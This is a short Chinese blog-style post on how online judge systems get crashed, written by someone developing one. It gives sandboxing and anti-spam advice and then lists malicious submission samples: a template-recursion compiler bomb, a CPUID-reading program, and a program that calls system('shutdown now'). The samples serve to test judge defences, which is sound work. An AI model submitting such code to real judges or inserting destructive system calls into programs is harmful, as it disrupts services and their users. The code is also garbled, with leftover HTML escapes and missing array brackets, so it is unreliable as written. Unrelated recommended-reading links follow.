咋搞垮一个Onlinejudge
我自己也正在开发一个Onlinejudge
首先肯定是权限问题,保证程序不能读和写除了数据之外的任何文件,以及操作网络,系统。验证码一定要强。像hustoj那样的数字验证码并不可取,攻击者只需要加上cookie便可以注册大量垃圾账号谨防机器提交post,每个最好加上验证字段或者验证码数据库一定要保护好,最好改一下端口。开外网的话不要暴露ip可以适当放慢访问速度一定要考虑周全。以下是垃圾代码https://github.com/vijos/malicious-codestruct x struct z\u0026lt;x(x(x(x(x(x(x(x(x(x(x(x(x(x(x(x(x(y,x(y\u0026gt;\u0026lt;y*,x(y*w\u0026gt;v\u0026lt;y*,w,x{}---#include \u0026lt;stdint.h\u0026gt;#include \u0026lt;iostream\u0026gt;#include \u0026lt;cpuid.h\u0026gt;static void cpuid(uint32_t func, uint32_t sub, uint32_t data) { __cpuid_count(func, sub, data, data, data, data);}int main() { uint32_t data; char str; for(int i = 0; i \u0026lt; 3; ++i) { cpuid(0x80000002 + i, 0, data); for(int j = 0; j \u0026lt; 4; ++j) reinterpret_cast\u0026lt;uint32_t*\u0026gt;(str) = data; } std::cout \u0026lt;\u0026lt; str;}---#include \u0026lt;bits/stdc++.h\u0026gt;using namespace std;int main() { system("shutdown now"); return 0;} 【咋搞垮一个Onlinejudge】 待续。。
推荐阅读
- 同比■同比增长7.1%!2021年的第一个节你花了多少钱?
- “他是我第一个会说普通话的老师”:一对师生折射青海山村蝶变
- 有必要重新开个C店吗
- 大学再有三个月就结束了,没学到知识,参加一个软件测试培训机构好吗
- 汽车|长安UNI-K又将开创一个新的"引力"纪元?
- 神话|武汉传奇父亲:一个平行班孩子创造的高考神话(感动上万家长)
- 王者荣耀李白能不能出肉
- 直播会成为品牌传播的另一个途径么有哪些可行的方法感觉有戏又没头绪好捉急。
- 怎样成为一名合格的Python程序员?
- 知乎有没有必要增加一个特别关注功能